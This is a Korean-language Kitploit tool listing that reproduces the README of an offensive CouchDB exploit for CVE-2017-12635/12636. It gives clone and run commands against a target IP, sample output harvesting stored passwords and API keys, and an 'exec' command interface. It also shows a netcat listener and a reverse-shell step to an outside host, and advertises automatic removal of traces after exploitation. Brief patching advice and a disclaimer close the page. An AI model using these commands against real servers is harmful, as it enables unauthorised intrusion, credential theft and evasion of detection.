Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
couchdb-exploit — CouchDB CVE-2017-12635/12636 취약점을 악용하여 권한 상승 및 RCE를 수행하고, 명령 실행, 데이터베이스 탐색, 리버스 셸을 포함한 대화형 셸을 제공합니다. | Kitploit
도구/GitHubGitHub/darabium/couchdb-exploit
Privilege EscalationExploitationInformation GatheringPost-ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubdarabium/couchdb-exploit

couchdb-exploit

CouchDB CVE-2017-12635/12636 취약점을 악용하여 권한 상승 및 RCE를 수행하고, 명령 실행, 데이터베이스 탐색, 리버스 셸을 포함한 대화형 셸을 제공합니다.

저장소 보기
18일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚀 CouchDB 익스플로잇 - CVE-2017-12635 & CVE-2017-12636

Python License CVE CVE

Apache CouchDB - 권한 상승 및 원격 코드 실행

GitHub stars GitHub forks


📖 개요

이 도구는 Apache CouchDB의 두 가지 심각한 취약점을 악용합니다:

CVE설명심각도
CVE-2017-12635JSON 파싱 우회를 통한 권한 상승🔴 치명적
CVE-2017-12636Query Server를 통한 원격 코드 실행🔴 치명적

작동 방식

  1. CVE-2017-12635: Erlang과 JavaScript 파서 간의 일관되지 않은 JSON 파싱을 악용하여 관리자 사용자를 생성합니다
  2. CVE-2017-12636: 관리자 접근 권한을 사용하여 악성 Query Server를 구성하고 시스템 명령을 실행합니다

🎯 취약한 버전

빠른 확인

curl http://target:5984/

If version is 1.x.x or 2.0.x/2.1.0 → VULNERABLE

✨ 기능

root@kitploit:~
✅ 자동 악용 - 하나의 명령으로 모두 처리

✅ 대화형 셸 - 사용자 친화적인 명령 인터페이스

✅ 데이터베이스 뷰어 - 모든 데이터베이스와 문서 탐색

✅ 전체 JSON 표시 - 완전한 문서 내용 확인

✅ 전체 검색 - 모든 데이터베이스에서 키워드 검색

✅ 시스템 명령 - 대상에서 임의의 명령 실행

✅ 리버스 셸 - 완전한 대화형 셸 확보

✅ 명령 기록 - 수행한 작업 추적

✅ 자동 정리 - 악용 후 흔적 제거

✅ 컬러 출력 - 읽기 쉽고 이해하기 쉬움

📦 설치 사전 요구 사항 bash

Python 3.6+ required

python3 --version

클론 및 설치 bash

Clone the repository

git clone https://github.com/darabium/couchdb-exploit.git cd couchdb-exploit

Install dependencies

pip install -r requirements.txt

요구 사항 txt

requests>=2.25.0 urllib3>=1.26.0

🚀 사용법 기본 사용법 bash

Simple exploit

python3 couchdb-exploit.py -t <TARGET_IP> -p

Example

python3 couchdb-exploit.py -t 192.168.1.100 -p 5984

명령줄 옵션 bash

python3 couchdb-exploit.py -h

usage: couchdb-exploit.py [-h] -t TARGET [-p PORT]

arguments: -h, --help show this help message and exit -t TARGET, --target TARGET Target IP address or hostname -p PORT, --port PORT Target port (default: 5984)

💻 명령어

악용에 성공하면 대화형 셸을 사용할 수 있습니다:

📊 예시

  1. 모든 데이터베이스 나열 bash

couchdb> db

[+] 39 databases:

  1. _replicator (0 docs)

  2. _users (12 docs)

  3. admin (5 docs)

  4. passwords (25 docs)

  5. core-configuration (8 docs) ...

  6. 데이터베이스 내용 보기 bash

couchdb> view passwords

[+] Viewing database: passwords

[*] Total documents: 25

📄 Document #1 ID: user_admin Full content: { "_id": "user_admin", "username": "admin", "password": "Admin123!", "email": "[email protected]", "role": "superadmin" }

  1. 자격 증명 검색 bash

couchdb> search password

[+] Searching for 'password' in all databases...

✅ Found in 'passwords' ID: user1 Content: { "username": "root", "password": "rootpass123" }

✅ Found in 'config' ID: app_settings Content: { "db_password": "secret123", "api_key": "sk_live_abc123" }

  1. 시스템 명령 실행 bash

couchdb> exec whoami [+] Executing: whoami [+] Command executed!

couchdb> exec id [+] Executing: id [+] Command executed!

  1. 리버스 셸 bash

On your machine (listener)

nc -lvnp 4444

In the exploit

couchdb> reverse 10.0.0.1 4444 [+] Setting up reverse shell to 10.0.0.1:4444 [!] Make sure listener is running: nc -lvnp 4444 [?] Continue? (y/n): y [+] Reverse shell triggered!

You should get a shell on your listener!

🖼️ 스크린샷 작동 중인 익스플로잇

https://via.placeholder.com/800x400?text=Exploit+Demo+Screenshot 데이터베이스 보기

https://via.placeholder.com/800x400?text=Database+View 리버스 셸

https://via.placeholder.com/800x400?text=Reverse+Shell

⚠️ 면책 조항

root@kitploit:~
중요: 이 도구는 교육 및 승인된 테스트 목적으로만 사용해야 합니다.

    🚫 명시적 허가 없이 시스템에 사용하지 마세요

    🚫 작성자는 어떠한 오용에 대해서도 책임을 지지 않습니다

    🚫 통제된 환경 또는 자신의 시스템에서만 사용하세요

    ✅ 테스트 전에 반드시 서면 승인을 받으세요

    ✅ 책임 있는 공개 관행을 따르세요

이 도구를 사용함으로써 귀하는 다음 약관에 동의하는 것입니다. 🔐 보안 팁

시스템 관리자라면:

root@kitploit:~
즉시 CouchDB ≥ 1.7.0 또는 ≥ 2.1.1로 업그레이드하세요

방화벽을 사용하여 포트 5984에 대한 접근을 제한하세요

인증을 활성화하고 강력한 암호를 사용하세요

의심스러운 활동이 있는지 로그를 모니터링하세요

인프라에 대한 정기적인 보안 감사를 수행하세요

빠른 해결 방법 bash

Upgrade CouchDB

sudo apt-get update sudo apt-get install couchdb=2.1.1 # Or latest version

Restrict access

sudo ufw allow from 192.168.1.0/24 to any port 5984

📚 참고 자료

root@kitploit:~
CVE-2017-12635 - NVD

CVE-2017-12636 - NVD

Apache CouchDB 보안

Exploit-DB

👤 작성자

darabium

root@kitploit:~
GitHub: @darabium

Telegram: @darabium

⭐ 지원

유용하다고 생각되면:

root@kitploit:~
⭐ 저장소에 스타를 남겨주세요

🐛 이슈를 보고해주세요

🔧 개선 사항에 기여해주세요

📢 다른 사람들과 공유해주세요

📄 라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.

보안 연구를 위해 ❤️로 제작되었습니다

⬆ 맨 위로

도구 다운로드
버전취약 여부수정 버전
Apache CouchDB < 1.7.0✅ 예1.7.0
Apache CouchDB 1.x.x✅ 예1.7.0
Apache CouchDB 2.0.0✅ 예2.1.1
Apache CouchDB 2.1.0✅ 예2.1.1
Apache CouchDB ≥ 2.1.1❌ 아니요-
명령어설명예시
db문서 수와 함께 모든 데이터베이스 표시db
view 데이터베이스의 모든 문서 보기 (전체 JSON)view passwords
raw 원시 서버 응답 표시raw admin
count 데이터베이스의 문서 수 계산count users
search 모든 데이터베이스에서 키워드 검색search admin
exec 시스템 명령 실행exec whoami
reverse 리버스 셸 설정reverse 10.0.0.1 4444
history명령 기록 표시history
help이 메뉴 표시help
exit정리 후 종료exit